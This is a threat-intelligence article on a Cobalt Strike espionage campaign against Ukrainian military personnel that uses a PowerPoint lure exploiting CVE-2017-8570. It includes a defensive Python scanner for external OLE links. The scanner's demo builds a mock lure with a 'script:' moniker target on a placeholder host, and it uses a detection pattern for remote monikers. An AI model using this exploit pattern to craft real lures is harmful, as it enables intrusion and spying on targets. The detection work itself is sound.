Security researchers at Deep Instinct Threat Lab have disclosed a cyber espionage campaign aimed at Ukrainian military personnel. The attackers exploited CVE-2017-8570, a Microsoft Office vulnerability that had been patched nearly seven years earlier, to deliver the post-exploitation framework Cobalt Strike. The campaign came to light after a malicious PPSX (PowerPoint Slideshow) file was uploaded from Ukraine to the VirusTotal scanning platform at the end of 2023; the content of the lure indicates a deliberate effort to compromise military-related targets.
Technical Breakdown of the Attack
The initial stage of the attack was a PowerPoint Slideshow file, masquerading as a US Army manual for tank mine clearing blades, that contained a relationship to an external OLE object rather than an embedded one. The "script:" moniker prefix on that remote target identifies the exploit as CVE-2017-8570, which bypassed the patch Microsoft had shipped for the earlier CVE-2017-0199 and causes Office to fetch and execute a remote scriptlet. The scriptlet was served from a domain fronted by Cloudflare, behind which sat a Russian VPS provider, making the infrastructure harder to trace. The second stage was an HTML file whose JavaScript established persistence, decoded an embedded payload and wrote it to disk under a filename resembling a Cisco AnyConnect VPN component. That payload, a dynamic-link library, injected a Cobalt Strike Beacon into memory, where it waited for tasking from a command and control (C2) server.
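One way to triage a slideshow like this, as an added example that is not Deep Instinct's tooling or code from the campaign: a PPSX is an OOXML zip, and the relationship parts (`*.rels`) record where each OLE object lives. Benign embedded objects use a relative target inside the package; the lure described above needs an external target with a moniker prefix such as `script:`. The Python script below walks every `.rels` part and flags OLE relationships that are external or carry a remote moniker. The archive it builds is constructed for the demonstration and is not a real deck, and the domain `cdn.example.invalid` and the file name `widget.sct` are hypothetical.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship namespace and the relationship type Office uses for
# OLE objects referenced from a slide.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

# Moniker prefixes that make Office fetch (and, for script:, execute) remote
# content named in a relationship target. "script:" is the scriptlet moniker
# abused by CVE-2017-8570; the URL monikers cover the CVE-2017-0199 pattern.
REMOTE_MONIKER = re.compile(r"^(script|mhtml|https?|ftp|file):", re.IGNORECASE)


def find_external_ole_links(ppsx_bytes):
    """Scan every .rels part in an OOXML archive and return (part, target)
    pairs for OLE relationships that point outside the package.

    A legitimate embedded object is linked with a relative Target such as
    ../embeddings/oleObject1.bin and no TargetMode; an external OLE link
    with a moniker prefix is what the CVE-2017-8570 lure relies on."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            # For untrusted files, parse with defusedxml in production; the
            # stdlib parser is used here to keep the example dependency-free.
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if external or REMOTE_MONIKER.match(target):
                    hits.append((name, target))
    return hits


def build_sample_ppsx(target, external=True):
    """Constructed minimal archive containing only the parts the check
    inspects (not a real slide deck); used to exercise the scanner offline."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="{target}"{mode}/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/slide1.xml",
                    '<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical lure: the script: moniker pointing at a remote .sct file,
    # next to a benign deck that embeds its OLE object inside the package.
    lure = build_sample_ppsx("script:https://cdn.example.invalid/widget.sct")
    benign = build_sample_ppsx("../embeddings/oleObject1.bin", external=False)
    for label, blob in (("lure", lure), ("benign", benign)):
        print(label, find_external_ole_links(blob))
```

The check is deliberately narrow: it reads only relationship metadata, so it costs nothing to run on a mail gateway and does not depend on the lure's text. Because the second stage in this campaign lived on attacker-controlled infrastructure, the target URL in any hit is also the first indicator worth pivoting on.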
Evasion Tactics and Attribution Challenges
The attackers used a cracked copy of Cobalt Strike and added several evasion and anti-analysis measures to hinder detection and slow down investigators. Despite the care that went into the operation, Deep Instinct Threat Lab has not attributed it to any known threat actor. The available evidence is geographically mixed: the sample was submitted from Ukraine, the second stage was hosted by a Russian VPS provider, and the Cobalt Strike Beacon C2 domain was registered in Warsaw, Poland. The domain names chosen for the attack bore no relation to military content, which further obscured the operators' intent.
Last Updated on November 7, 2024 8:46 pm CET